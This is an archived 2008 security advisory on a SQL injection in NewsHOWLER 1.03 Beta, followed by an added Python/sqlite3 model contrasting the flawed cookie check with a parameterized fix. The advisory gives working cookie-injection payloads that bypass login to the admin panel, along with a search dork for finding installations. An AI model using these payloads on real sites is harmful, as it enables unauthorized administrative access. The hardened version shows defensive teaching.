NewsHOWLER 1.03 Beta Cookie Handling Via SQL Injection

2008-08-18T00:00:00
ID SECURITYVULNS:DOC:20380
Type securityvulns
Reporter Securityvulns
Modified 2008-08-18T00:00:00

Description

NewsHOWLER 1.03 Beta Cookie Handling Via SQL Injection

AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))

Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))

Our Site : Http://IRCRASH.COM

IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)

Download : http://garr.dl.sourceforge.net/sourceforge/newshowler/NewsHOWLER-1.03-Beta.tgz

DORK : "Net Dupe © 2002. All Rights Reserved"

[Exploit]

javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";

javascript:document.cookie = "news_password=3; path=/";

Then, if you open http://Site/users.php, you can see the admin panel ;)
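
Added example, not part of the original advisory and not NewsHOWLER's own code: a Python/sqlite3 model of the cookie check that the exploit above implies, next to a parameterized version that rejects the same cookies. The query shape, the column names, the stored account and the direct password comparison are assumptions inferred from the four-value UNION and the news_password=3 cookie; NewsHOWLER itself is PHP.

```python
import hmac
import sqlite3
from urllib.parse import unquote_plus

def make_db():
    # Constructed schema: four columns, matching the four-value UNION in the advisory.
    # Column names and the stored account are hypothetical.
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.execute("CREATE TABLE news_users "
               "(id INTEGER, username TEXT, password TEXT, is_admin INTEGER)")
    db.execute("INSERT INTO news_users VALUES (1, 'admin', 'S3cret-not-3', 1)")
    return db

def check_vulnerable(db, cookies):
    """Assumed shape of the flawed check: cookie text concatenated into the SQL."""
    user = unquote_plus(cookies.get("news_user", ""))  # PHP URL-decodes cookie values too
    sql = ("SELECT id, username, password, is_admin FROM news_users "
           "WHERE username = '" + user + "'")
    row = db.execute(sql).fetchone()
    # The row can come from an injected UNION, so the "stored" password
    # compared here is whatever the cookie author put in the query.
    return row is not None and str(row["password"]) == cookies.get("news_password", "")

def check_hardened(db, cookies):
    """Same lookup with the cookie bound as a parameter, so it is never parsed as SQL."""
    user = unquote_plus(cookies.get("news_user", ""))
    row = db.execute(
        "SELECT password FROM news_users WHERE username = ?", (user,)
    ).fetchone()
    if row is None:
        return False
    supplied = cookies.get("news_password", "").encode()
    return hmac.compare_digest(str(row["password"]).encode(), supplied)

# Cookie values exactly as given in the advisory's [Exploit] section.
ADVISORY_COOKIES = {
    "news_user": "zz'+union+select+3,3,3,3+from+news_users/*",
    "news_password": "3",
}
# Constructed legitimate cookies for the hypothetical account above.
LEGIT_COOKIES = {"news_user": "admin", "news_password": "S3cret-not-3"}

if __name__ == "__main__":
    db = make_db()
    for name, cookies in (("advisory", ADVISORY_COOKIES), ("legit", LEGIT_COOKIES)):
        print(name, "vulnerable:", check_vulnerable(db, cookies),
              "hardened:", check_hardened(db, cookies))
```

Binding the parameter closes the injection only; a credential kept in a client-controlled cookie is still better replaced by a server-side session identifier and a hashed password.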
